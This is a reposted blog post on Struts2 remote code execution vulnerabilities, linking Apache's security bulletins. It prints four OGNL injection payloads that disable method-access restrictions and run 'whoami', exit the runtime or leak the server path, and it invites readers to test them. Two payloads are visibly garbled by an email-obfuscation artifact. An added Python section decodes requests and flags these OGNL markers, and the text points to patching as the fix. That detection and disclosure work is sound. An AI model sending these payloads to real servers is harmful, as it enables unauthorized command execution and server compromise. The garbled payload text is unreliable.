High-risk Struts2 remote code execution vulnerabilities

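Struts2 users, take note: several fairly serious security vulnerabilities have been disclosed recently, and their impact is severe. If you have not patched yet, patch now, or your server will get owned by someone else.
A few exploits are published below; anyone interested can test them, and if anything is unclear, contact me and we can work through it together. We might even find a 0day.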

The 15 vulnerabilities and their patches are listed on the official site:
https://cwiki.apache.org/confluence/display/WW/Security+Bulletins

exp1:
?('\u0023_memberAccess[\'allowStaticMethodAccess\']')(meh)=true&(aaa)(('\u0023context[\'xwork.MethodAccessor.denyMethodExecution\']\u003d\u0023foo')(\u0023foo\u003dnew%20java.lang.Boolean("false")))&(asdf)(('\u0023rt.exit(1)')(\u0023rt\[email protected]@getRuntime()))=1  



exp2:
?class.classLoader.jarPath=(%23context%5b"xwork.MethodAccessor.denyMethodExecution"%5d%3d+new+java.lang.Boolean(false)%2c+%23_memberAccess%5b"allowStaticMethodAccess"%5d%3dtrue%2c+%23a%3d%40java.lang.Runtime%40getRuntime().exec(%27whoami%27).getInputStream()%2c%23b%3dnew+java.io.InputStreamReader(%23a)%2c%23c%3dnew+java.io.BufferedReader(%23b)%2c%23d%3dnew+char%5b50000%5d%2c%23c.read(%23d)%2c%23s3cur1ty%3d%40org.apache.struts2.ServletActionContext%40getResponse().getWriter()%2c%23s3cur1ty.println(%23d)%2c%23s3cur1ty.close())(aa)&x[(class.classLoader.jarPath)('aa')]


exp3:
1${(%23_memberAccess["allowStaticMethodAccess"]=true,%[email protected]@getRequest(),%[email protected]@getResponse().getWriter(),%23k8out.println(%23req.getRealPath("/")),%23k8out.close())}


exp4:
${%23context%5b"xwork.MethodAccessor.denyMethodExecution"%5d%3d new java.lang.Boolean(false)%2c %23_memberAccess%5b"allowStaticMethodAccess"%5d%3dtrue%2c %23a%3d%40java.lang.Runtime%40getRuntime().exec(%27whoami%27).getInputStream()%2c%23b%3dnew java.io.InputStreamReader(%23a)%2c%23c%3dnew java.io.BufferedReader(%23b)%2c%23d%3dnew char%5b50000%5d%2c%23c.read(%23d)%2c%23s3cur1ty%3d%40org.apache.struts2.ServletActionContext%40getResponse().getWriter()%2c%23s3cur1ty.println(%23d)%2c%23s3cur1ty.close()}
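
A defensive check built from the strings visible in the payloads above, as an added example that is not part of the original post: it decodes percent-encoding and \uXXXX escapes (repeatedly, to catch double encoding, which goes beyond the single-encoded cases shown here) and flags request targets that carry the OGNL markers. The function names, the marker set and the sample request lines are constructed for illustration.

```python
import re
from urllib.parse import unquote_plus

# Markers taken from the payloads on this page, matched after decoding.
MARKERS = {
    "member_access": re.compile(r"#_memberAccess\b"),
    "static_method_access": re.compile(r"allowStaticMethodAccess"),
    "deny_method_execution": re.compile(r"xwork\.MethodAccessor\.denyMethodExecution"),
    "classloader_param": re.compile(r"\bclass\.classLoader\b"),
    "static_call": re.compile(r"@[\w.]+@\w+\("),
    "ognl_expression": re.compile(r"\$\{[^}]*#"),
}

_UNICODE_ESC = re.compile(r"\\u([0-9a-fA-F]{4})")


def normalize(raw: str, max_rounds: int = 3) -> str:
    """Undo percent-encoding and \\uXXXX escapes, repeating to catch nested encoding."""
    text = raw
    for _ in range(max_rounds):
        decoded = unquote_plus(text)
        decoded = _UNICODE_ESC.sub(lambda m: chr(int(m.group(1), 16)), decoded)
        if decoded == text:
            break
        text = decoded
    return text


def scan_request(target: str) -> list[str]:
    """Return the sorted names of OGNL-injection markers found in a request target."""
    text = normalize(target)
    return sorted(name for name, rx in MARKERS.items() if rx.search(text))


# Constructed sample request targets: shortened fragments of the page's payloads plus a benign one.
SAMPLES = [
    "/index.action?id=42&name=foo%23bar",
    "/index.action?('\\u0023_memberAccess[\\'allowStaticMethodAccess\\']')(meh)=true",
    "/index.action?class.classLoader.jarPath=(%23_memberAccess%5b%22allowStaticMethodAccess%22%5d%3dtrue)(aa)",
    "/index.action?id=1$%7b%2523_memberAccess%5b%22allowStaticMethodAccess%22%5d=true%7d",
]

if __name__ == "__main__":
    for line in SAMPLES:
        print(scan_request(line) or "clean", "<-", line)
```

Marker matching like this is a detection aid for access logs or a request filter; the fix remains applying the Struts2 updates from the bulletins linked above.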

Reposted from wuxianjun.iteye.com/blog/1898276